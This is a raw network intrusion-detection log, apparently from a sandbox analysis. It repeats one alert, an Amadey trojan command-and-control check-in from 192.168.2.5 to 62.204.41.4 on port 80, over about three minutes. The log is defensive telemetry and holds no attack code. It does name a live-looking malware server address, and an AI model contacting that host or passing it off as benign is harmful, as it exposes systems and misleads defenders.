192.168.2.562.204.41.449804802027700 02/07/23-19:57:32.699147	TCP	2027700	ET TROJAN Amadey CnC Check-In	49804	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450386802027700 02/07/23-20:00:13.098003	TCP	2027700	ET TROJAN Amadey CnC Check-In	50386	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450132802027700 02/07/23-19:59:02.326823	TCP	2027700	ET TROJAN Amadey CnC Check-In	50132	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449770802027700 02/07/23-19:57:21.824482	TCP	2027700	ET TROJAN Amadey CnC Check-In	49770	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449983802027700 02/07/23-19:58:21.153208	TCP	2027700	ET TROJAN Amadey CnC Check-In	49983	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450227802027700 02/07/23-19:59:30.297316	TCP	2027700	ET TROJAN Amadey CnC Check-In	50227	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450222802027700 02/07/23-19:59:29.105694	TCP	2027700	ET TROJAN Amadey CnC Check-In	50222	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449739802027700 02/07/23-19:57:15.413161	TCP	2027700	ET TROJAN Amadey CnC Check-In	49739	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450185802027700 02/07/23-19:59:17.468502	TCP	2027700	ET TROJAN Amadey CnC Check-In	50185	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450381802027700 02/07/23-20:00:11.899082	TCP	2027700	ET TROJAN Amadey CnC Check-In	50381	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449898802027700 02/07/23-19:57:58.651415	TCP	2027700	ET TROJAN Amadey CnC Check-In	49898	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450317802027700 02/07/23-19:59:54.125434	TCP	2027700	ET TROJAN Amadey CnC Check-In	50317	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450104802027700 02/07/23-19:58:55.183792	TCP	2027700	ET TROJAN Amadey CnC Check-In	50104	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450358802027700 02/07/23-20:00:06.314097	TCP	2027700	ET TROJAN Amadey CnC Check-In	50358	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449857802027700 02/07/23-19:57:48.874538	TCP	2027700	ET TROJAN Amadey CnC Check-In	49857	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449893802027700 02/07/23-19:57:57.434157	TCP	2027700	ET TROJAN Amadey CnC Check-In	49893	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449935802027700 02/07/23-19:58:09.870706	TCP	2027700	ET TROJAN Amadey CnC Check-In	49935	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449697802027700 02/07/23-19:57:03.625893	TCP	2027700	ET TROJAN Amadey CnC Check-In	49697	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450026802027700 02/07/23-19:58:34.056162	TCP	2027700	ET TROJAN Amadey CnC Check-In	50026	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450067802027700 02/07/23-19:58:46.185179	TCP	2027700	ET TROJAN Amadey CnC Check-In	50067	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450263802027700 02/07/23-19:59:38.967068	TCP	2027700	ET TROJAN Amadey CnC Check-In	50263	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450373802027700 02/07/23-20:00:09.942649	TCP	2027700	ET TROJAN Amadey CnC Check-In	50373	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449754802027700 02/07/23-19:57:18.680477	TCP	2027700	ET TROJAN Amadey CnC Check-In	49754	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449852802027700 02/07/23-19:57:46.015163	TCP	2027700	ET TROJAN Amadey CnC Check-In	49852	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450082802027700 02/07/23-19:58:49.824851	TCP	2027700	ET TROJAN Amadey CnC Check-In	50082	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450410802027700 02/07/23-20:00:18.845590	TCP	2027700	ET TROJAN Amadey CnC Check-In	50410	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449840802027700 02/07/23-19:57:41.244153	TCP	2027700	ET TROJAN Amadey CnC Check-In	49840	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450079802027700 02/07/23-19:58:49.105142	TCP	2027700	ET TROJAN Amadey CnC Check-In	50079	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450202802027700 02/07/23-19:59:21.791441	TCP	2027700	ET TROJAN Amadey CnC Check-In	50202	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450300802027700 02/07/23-19:59:50.001268	TCP	2027700	ET TROJAN Amadey CnC Check-In	50300	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450018802027700 02/07/23-19:58:32.051728	TCP	2027700	ET TROJAN Amadey CnC Check-In	50018	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450198802027700 02/07/23-19:59:20.390515	TCP	2027700	ET TROJAN Amadey CnC Check-In	50198	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450116802027700 02/07/23-19:58:58.086949	TCP	2027700	ET TROJAN Amadey CnC Check-In	50116	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449907802027700 02/07/23-19:58:00.832041	TCP	2027700	ET TROJAN Amadey CnC Check-In	49907	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449787802027700 02/07/23-19:57:28.606188	TCP	2027700	ET TROJAN Amadey CnC Check-In	49787	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450428802027700 02/07/23-20:00:25.267783	TCP	2027700	ET TROJAN Amadey CnC Check-In	50428	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449910802027700 02/07/23-19:58:01.546921	TCP	2027700	ET TROJAN Amadey CnC Check-In	49910	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450345802027700 02/07/23-20:00:01.959618	TCP	2027700	ET TROJAN Amadey CnC Check-In	50345	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449782802027700 02/07/23-19:57:25.569842	TCP	2027700	ET TROJAN Amadey CnC Check-In	49782	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449824802027700 02/07/23-19:57:37.320314	TCP	2027700	ET TROJAN Amadey CnC Check-In	49824	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450152802027700 02/07/23-19:59:09.531894	TCP	2027700	ET TROJAN Amadey CnC Check-In	50152	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449809802027700 02/07/23-19:57:33.899731	TCP	2027700	ET TROJAN Amadey CnC Check-In	49809	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450235802027700 02/07/23-19:59:32.185122	TCP	2027700	ET TROJAN Amadey CnC Check-In	50235	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449726802027700 02/07/23-19:57:12.281502	TCP	2027700	ET TROJAN Amadey CnC Check-In	49726	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450054802027700 02/07/23-19:58:40.604509	TCP	2027700	ET TROJAN Amadey CnC Check-In	50054	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450309802027700 02/07/23-19:59:52.188472	TCP	2027700	ET TROJAN Amadey CnC Check-In	50309	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450407802027700 02/07/23-20:00:18.142047	TCP	2027700	ET TROJAN Amadey CnC Check-In	50407	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450137802027700 02/07/23-19:59:06.138198	TCP	2027700	ET TROJAN Amadey CnC Check-In	50137	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449902802027700 02/07/23-19:57:59.605442	TCP	2027700	ET TROJAN Amadey CnC Check-In	49902	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450230802027700 02/07/23-19:59:30.997466	TCP	2027700	ET TROJAN Amadey CnC Check-In	50230	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449865802027700 02/07/23-19:57:50.851457	TCP	2027700	ET TROJAN Amadey CnC Check-In	49865	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449943802027700 02/07/23-19:58:11.590299	TCP	2027700	ET TROJAN Amadey CnC Check-In	49943	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450443802027700 02/07/23-20:00:28.848844	TCP	2027700	ET TROJAN Amadey CnC Check-In	50443	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450271802027700 02/07/23-19:59:41.182547	TCP	2027700	ET TROJAN Amadey CnC Check-In	50271	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449790802027700 02/07/23-19:57:29.323510	TCP	2027700	ET TROJAN Amadey CnC Check-In	49790	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450087802027700 02/07/23-19:58:51.030172	TCP	2027700	ET TROJAN Amadey CnC Check-In	50087	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450129802027700 02/07/23-19:59:01.428744	TCP	2027700	ET TROJAN Amadey CnC Check-In	50129	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450046802027700 02/07/23-19:58:38.668972	TCP	2027700	ET TROJAN Amadey CnC Check-In	50046	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449873802027700 02/07/23-19:57:52.544613	TCP	2027700	ET TROJAN Amadey CnC Check-In	49873	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450415802027700 02/07/23-20:00:21.209012	TCP	2027700	ET TROJAN Amadey CnC Check-In	50415	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449795802027700 02/07/23-19:57:30.522001	TCP	2027700	ET TROJAN Amadey CnC Check-In	49795	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449878802027700 02/07/23-19:57:53.715011	TCP	2027700	ET TROJAN Amadey CnC Check-In	49878	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449837802027700 02/07/23-19:57:40.510394	TCP	2027700	ET TROJAN Amadey CnC Check-In	49837	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450165802027700 02/07/23-19:59:12.675415	TCP	2027700	ET TROJAN Amadey CnC Check-In	50165	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450378802027700 02/07/23-20:00:11.173249	TCP	2027700	ET TROJAN Amadey CnC Check-In	50378	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450124802027700 02/07/23-19:59:00.013175	TCP	2027700	ET TROJAN Amadey CnC Check-In	50124	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450337802027700 02/07/23-19:59:58.938844	TCP	2027700	ET TROJAN Amadey CnC Check-In	50337	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450207802027700 02/07/23-19:59:25.359503	TCP	2027700	ET TROJAN Amadey CnC Check-In	50207	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450341802027700 02/07/23-20:00:00.154878	TCP	2027700	ET TROJAN Amadey CnC Check-In	50341	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449722802027700 02/07/23-19:57:11.275289	TCP	2027700	ET TROJAN Amadey CnC Check-In	49722	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449976802027700 02/07/23-19:58:19.455952	TCP	2027700	ET TROJAN Amadey CnC Check-In	49976	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450436802027700 02/07/23-20:00:27.196537	TCP	2027700	ET TROJAN Amadey CnC Check-In	50436	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450430802027700 02/07/23-20:00:25.739838	TCP	2027700	ET TROJAN Amadey CnC Check-In	50430	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449719802027700 02/07/23-19:57:10.555436	TCP	2027700	ET TROJAN Amadey CnC Check-In	49719	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450338802027700 02/07/23-19:59:59.187277	TCP	2027700	ET TROJAN Amadey CnC Check-In	50338	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450427802027700 02/07/23-20:00:25.032850	TCP	2027700	ET TROJAN Amadey CnC Check-In	50427	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449808802027700 02/07/23-19:57:33.669443	TCP	2027700	ET TROJAN Amadey CnC Check-In	49808	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449906802027700 02/07/23-19:58:00.574287	TCP	2027700	ET TROJAN Amadey CnC Check-In	49906	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449817802027700 02/07/23-19:57:35.876380	TCP	2027700	ET TROJAN Amadey CnC Check-In	49817	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450329802027700 02/07/23-19:59:57.013885	TCP	2027700	ET TROJAN Amadey CnC Check-In	50329	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450074802027700 02/07/23-19:58:47.870199	TCP	2027700	ET TROJAN Amadey CnC Check-In	50074	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449915802027700 02/07/23-19:58:02.781708	TCP	2027700	ET TROJAN Amadey CnC Check-In	49915	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450172802027700 02/07/23-19:59:14.371003	TCP	2027700	ET TROJAN Amadey CnC Check-In	50172	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450013802027700 02/07/23-19:58:30.820175	TCP	2027700	ET TROJAN Amadey CnC Check-In	50013	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450270802027700 02/07/23-19:59:40.657861	TCP	2027700	ET TROJAN Amadey CnC Check-In	50270	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449948802027700 02/07/23-19:58:12.777625	TCP	2027700	ET TROJAN Amadey CnC Check-In	49948	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450083802027700 02/07/23-19:58:50.074970	TCP	2027700	ET TROJAN Amadey CnC Check-In	50083	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450402802027700 02/07/23-20:00:16.938938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50402	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450169802027700 02/07/23-19:59:13.653163	TCP	2027700	ET TROJAN Amadey CnC Check-In	50169	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449750802027700 02/07/23-19:57:18.108794	TCP	2027700	ET TROJAN Amadey CnC Check-In	49750	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450267802027700 02/07/23-19:59:39.920444	TCP	2027700	ET TROJAN Amadey CnC Check-In	50267	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449741802027700 02/07/23-19:57:15.910290	TCP	2027700	ET TROJAN Amadey CnC Check-In	49741	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450178802027700 02/07/23-19:59:15.810186	TCP	2027700	ET TROJAN Amadey CnC Check-In	50178	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450109802027700 02/07/23-19:58:56.416170	TCP	2027700	ET TROJAN Amadey CnC Check-In	50109	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450103802027700 02/07/23-19:58:54.948416	TCP	2027700	ET TROJAN Amadey CnC Check-In	50103	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450268802027700 02/07/23-19:59:40.160557	TCP	2027700	ET TROJAN Amadey CnC Check-In	50268	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450357802027700 02/07/23-20:00:06.081116	TCP	2027700	ET TROJAN Amadey CnC Check-In	50357	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449779802027700 02/07/23-19:57:24.309471	TCP	2027700	ET TROJAN Amadey CnC Check-In	49779	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449934802027700 02/07/23-19:58:09.625815	TCP	2027700	ET TROJAN Amadey CnC Check-In	49934	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449738802027700 02/07/23-19:57:15.178369	TCP	2027700	ET TROJAN Amadey CnC Check-In	49738	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450014802027700 02/07/23-19:58:31.062717	TCP	2027700	ET TROJAN Amadey CnC Check-In	50014	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449975802027700 02/07/23-19:58:19.199653	TCP	2027700	ET TROJAN Amadey CnC Check-In	49975	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450210802027700 02/07/23-19:59:26.169613	TCP	2027700	ET TROJAN Amadey CnC Check-In	50210	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450411802027700 02/07/23-20:00:19.306270	TCP	2027700	ET TROJAN Amadey CnC Check-In	50411	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450464802027700 02/07/23-20:00:33.699108	TCP	2027700	ET TROJAN Amadey CnC Check-In	50464	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450055802027700 02/07/23-19:58:40.841197	TCP	2027700	ET TROJAN Amadey CnC Check-In	50055	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450144802027700 02/07/23-19:59:07.591286	TCP	2027700	ET TROJAN Amadey CnC Check-In	50144	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450181802027700 02/07/23-19:59:16.514939	TCP	2027700	ET TROJAN Amadey CnC Check-In	50181	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450340802027700 02/07/23-19:59:59.670957	TCP	2027700	ET TROJAN Amadey CnC Check-In	50340	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449721802027700 02/07/23-19:57:11.038423	TCP	2027700	ET TROJAN Amadey CnC Check-In	49721	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449886802027700 02/07/23-19:57:55.680683	TCP	2027700	ET TROJAN Amadey CnC Check-In	49886	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450398802027700 02/07/23-20:00:15.996201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50398	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449845802027700 02/07/23-19:57:42.455705	TCP	2027700	ET TROJAN Amadey CnC Check-In	49845	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450251802027700 02/07/23-19:59:36.032976	TCP	2027700	ET TROJAN Amadey CnC Check-In	50251	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450197802027700 02/07/23-19:59:20.137780	TCP	2027700	ET TROJAN Amadey CnC Check-In	50197	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450239802027700 02/07/23-19:59:33.185655	TCP	2027700	ET TROJAN Amadey CnC Check-In	50239	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449811802027700 02/07/23-19:57:34.389822	TCP	2027700	ET TROJAN Amadey CnC Check-In	49811	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450379802027700 02/07/23-20:00:11.418266	TCP	2027700	ET TROJAN Amadey CnC Check-In	50379	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449947802027700 02/07/23-19:58:12.542504	TCP	2027700	ET TROJAN Amadey CnC Check-In	49947	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450214802027700 02/07/23-19:59:27.169597	TCP	2027700	ET TROJAN Amadey CnC Check-In	50214	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450128802027700 02/07/23-19:59:00.987231	TCP	2027700	ET TROJAN Amadey CnC Check-In	50128	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450312802027700 02/07/23-19:59:52.924013	TCP	2027700	ET TROJAN Amadey CnC Check-In	50312	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450468802027700 02/07/23-20:00:34.647098	TCP	2027700	ET TROJAN Amadey CnC Check-In	50468	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450125802027700 02/07/23-19:59:00.262200	TCP	2027700	ET TROJAN Amadey CnC Check-In	50125	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450223802027700 02/07/23-19:59:29.342199	TCP	2027700	ET TROJAN Amadey CnC Check-In	50223	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449864802027700 02/07/23-19:57:50.603717	TCP	2027700	ET TROJAN Amadey CnC Check-In	49864	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450131802027700 02/07/23-19:59:02.039230	TCP	2027700	ET TROJAN Amadey CnC Check-In	50131	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450385802027700 02/07/23-20:00:12.863067	TCP	2027700	ET TROJAN Amadey CnC Check-In	50385	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449766802027700 02/07/23-19:57:21.096100	TCP	2027700	ET TROJAN Amadey CnC Check-In	49766	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450070802027700 02/07/23-19:58:46.903603	TCP	2027700	ET TROJAN Amadey CnC Check-In	50070	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449849802027700 02/07/23-19:57:43.984219	TCP	2027700	ET TROJAN Amadey CnC Check-In	49849	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449775802027700 02/07/23-19:57:23.025798	TCP	2027700	ET TROJAN Amadey CnC Check-In	49775	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449858802027700 02/07/23-19:57:49.109185	TCP	2027700	ET TROJAN Amadey CnC Check-In	49858	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449794802027700 02/07/23-19:57:30.288757	TCP	2027700	ET TROJAN Amadey CnC Check-In	49794	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450140802027700 02/07/23-19:59:06.654084	TCP	2027700	ET TROJAN Amadey CnC Check-In	50140	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450394802027700 02/07/23-20:00:15.033222	TCP	2027700	ET TROJAN Amadey CnC Check-In	50394	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449791802027700 02/07/23-19:57:29.556151	TCP	2027700	ET TROJAN Amadey CnC Check-In	49791	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450042802027700 02/07/23-19:58:37.715383	TCP	2027700	ET TROJAN Amadey CnC Check-In	50042	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450296802027700 02/07/23-19:59:49.030441	TCP	2027700	ET TROJAN Amadey CnC Check-In	50296	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450039802027700 02/07/23-19:58:36.996099	TCP	2027700	ET TROJAN Amadey CnC Check-In	50039	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449922802027700 02/07/23-19:58:06.074309	TCP	2027700	ET TROJAN Amadey CnC Check-In	49922	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449880802027700 02/07/23-19:57:54.223863	TCP	2027700	ET TROJAN Amadey CnC Check-In	49880	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449931802027700 02/07/23-19:58:08.920914	TCP	2027700	ET TROJAN Amadey CnC Check-In	49931	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450455802027700 02/07/23-20:00:31.736851	TCP	2027700	ET TROJAN Amadey CnC Check-In	50455	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450201802027700 02/07/23-19:59:21.107449	TCP	2027700	ET TROJAN Amadey CnC Check-In	50201	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450325802027700 02/07/23-19:59:56.050545	TCP	2027700	ET TROJAN Amadey CnC Check-In	50325	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449836802027700 02/07/23-19:57:40.268244	TCP	2027700	ET TROJAN Amadey CnC Check-In	49836	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450366802027700 02/07/23-20:00:08.251401	TCP	2027700	ET TROJAN Amadey CnC Check-In	50366	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450449802027700 02/07/23-20:00:30.317849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50449	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450242802027700 02/07/23-19:59:33.886857	TCP	2027700	ET TROJAN Amadey CnC Check-In	50242	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450414802027700 02/07/23-20:00:20.800586	TCP	2027700	ET TROJAN Amadey CnC Check-In	50414	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450112802027700 02/07/23-19:58:57.136239	TCP	2027700	ET TROJAN Amadey CnC Check-In	50112	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449877802027700 02/07/23-19:57:53.477790	TCP	2027700	ET TROJAN Amadey CnC Check-In	49877	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449706802027700 02/07/23-19:57:08.141498	TCP	2027700	ET TROJAN Amadey CnC Check-In	49706	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449919802027700 02/07/23-19:58:03.999927	TCP	2027700	ET TROJAN Amadey CnC Check-In	49919	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449747802027700 02/07/23-19:57:17.384762	TCP	2027700	ET TROJAN Amadey CnC Check-In	49747	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449788802027700 02/07/23-19:57:28.836185	TCP	2027700	ET TROJAN Amadey CnC Check-In	49788	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450099802027700 02/07/23-19:58:53.985606	TCP	2027700	ET TROJAN Amadey CnC Check-In	50099	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450283802027700 02/07/23-19:59:45.895142	TCP	2027700	ET TROJAN Amadey CnC Check-In	50283	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450153802027700 02/07/23-19:59:09.775607	TCP	2027700	ET TROJAN Amadey CnC Check-In	50153	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450194802027700 02/07/23-19:59:19.434056	TCP	2027700	ET TROJAN Amadey CnC Check-In	50194	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450408802027700 02/07/23-20:00:18.376566	TCP	2027700	ET TROJAN Amadey CnC Check-In	50408	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449861802027700 02/07/23-19:57:49.861421	TCP	2027700	ET TROJAN Amadey CnC Check-In	49861	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449903802027700 02/07/23-19:57:59.838875	TCP	2027700	ET TROJAN Amadey CnC Check-In	49903	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449991802027700 02/07/23-19:58:23.361807	TCP	2027700	ET TROJAN Amadey CnC Check-In	49991	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450058802027700 02/07/23-19:58:41.573761	TCP	2027700	ET TROJAN Amadey CnC Check-In	50058	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449950802027700 02/07/23-19:58:13.249773	TCP	2027700	ET TROJAN Amadey CnC Check-In	49950	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449725802027700 02/07/23-19:57:11.991747	TCP	2027700	ET TROJAN Amadey CnC Check-In	49725	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449918802027700 02/07/23-19:58:03.708587	TCP	2027700	ET TROJAN Amadey CnC Check-In	49918	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450053802027700 02/07/23-19:58:40.354567	TCP	2027700	ET TROJAN Amadey CnC Check-In	50053	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450344802027700 02/07/23-20:00:01.675171	TCP	2027700	ET TROJAN Amadey CnC Check-In	50344	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449823802027700 02/07/23-19:57:37.077825	TCP	2027700	ET TROJAN Amadey CnC Check-In	49823	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450148802027700 02/07/23-19:59:08.546698	TCP	2027700	ET TROJAN Amadey CnC Check-In	50148	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450442802027700 02/07/23-20:00:28.613580	TCP	2027700	ET TROJAN Amadey CnC Check-In	50442	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449841802027700 02/07/23-19:57:41.479215	TCP	2027700	ET TROJAN Amadey CnC Check-In	49841	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449997802027700 02/07/23-19:58:26.812666	TCP	2027700	ET TROJAN Amadey CnC Check-In	49997	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450460802027700 02/07/23-20:00:32.743842	TCP	2027700	ET TROJAN Amadey CnC Check-In	50460	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449851802027700 02/07/23-19:57:45.497082	TCP	2027700	ET TROJAN Amadey CnC Check-In	49851	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450264802027700 02/07/23-19:59:39.205304	TCP	2027700	ET TROJAN Amadey CnC Check-In	50264	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450025802027700 02/07/23-19:58:33.797119	TCP	2027700	ET TROJAN Amadey CnC Check-In	50025	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450166802027700 02/07/23-19:59:12.953354	TCP	2027700	ET TROJAN Amadey CnC Check-In	50166	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450377802027700 02/07/23-20:00:10.926718	TCP	2027700	ET TROJAN Amadey CnC Check-In	50377	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450007802027700 02/07/23-19:58:29.284926	TCP	2027700	ET TROJAN Amadey CnC Check-In	50007	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450081802027700 02/07/23-19:58:49.575685	TCP	2027700	ET TROJAN Amadey CnC Check-In	50081	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450359802027700 02/07/23-20:00:06.547654	TCP	2027700	ET TROJAN Amadey CnC Check-In	50359	80	192.168.2.5	62.204.41.4
